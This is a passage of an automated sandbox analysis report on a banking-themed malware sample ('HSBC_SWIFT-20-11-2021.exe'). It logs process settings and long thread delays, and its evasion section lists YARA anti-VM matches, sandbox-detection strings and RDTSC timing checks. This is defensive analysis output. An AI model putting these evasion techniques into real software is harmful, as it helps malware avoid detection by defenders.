          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.HSBC_SWIFT-20-11-2021.exe.3028f8c.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.384521083.000000000314D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: HSBC_SWIFT-20-11-2021.exe PID: 7156, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384521083.000000000314D000.00000004.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384521083.000000000314D000.00000004.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000E38604 second address: 0000000000E3860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000E3898E second address: 0000000000E38994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 1724Thread sleep count: 4958 > 30Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -239857s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 1724Thread sleep count: 3383 > 30Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -239734s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 7160Thread sleep time: -31504s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -239624s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -239515s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -239404s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -239295s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -239187s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -239077s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -238952s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -238827s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -238703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -238593s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -238484s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -238374s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -238250s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -238139s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -238031s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -237921s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -237811s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -237703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -237593s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -237484s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -237374s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -237265s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -237156s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -237046s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -236937s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -236827s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -236718s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -236608s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -236498s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -236389s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -236280s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -236168s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -236062s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -235952s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -235843s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -235734s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -235624s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -235515s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -235405s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -235296s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -235124s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -235015s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -234905s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -234791s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -234664s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -234546s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -234406s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -234295s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -234156s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -233977s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -233856s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -233702s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -233590s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -233478s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -232547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -231469s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -231347s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -231203s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -231052s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -230932s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -230801s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -230640s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -230512s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -230405s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -230296s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -230187s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -230064s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -229906s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -229703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -229250s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -229140s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -229030s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -228656s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -223547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -223184s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128Thread sleep time: -223075s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5296Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4540Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4248Thread sleep count: 5369 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5504Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep count: 697 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004088C0 rdtsc 8_2_004088C0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239857Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239734Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239624Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239515Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239404Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239295Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239187Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239077Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238952Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238827Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238593Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238484Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238374Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238250Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238139Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238031Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237921Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237811Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237593Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237484Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237374Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237265Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237156Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237046Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236937Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236827Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236718Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236608Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236498Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236389Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236280Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236168Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236062Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235952Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235843Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235734Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235624Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235515Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235405Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235296Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235124Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235015Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234905Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234791Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234664Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234546Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234406Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234295Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234156Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233977Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233856Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233702Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233590Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233478Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 232547Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231469Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231347Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231203Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231052Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230932Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230801Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230640Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230512Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230405Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230296Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230187Jump to behavior
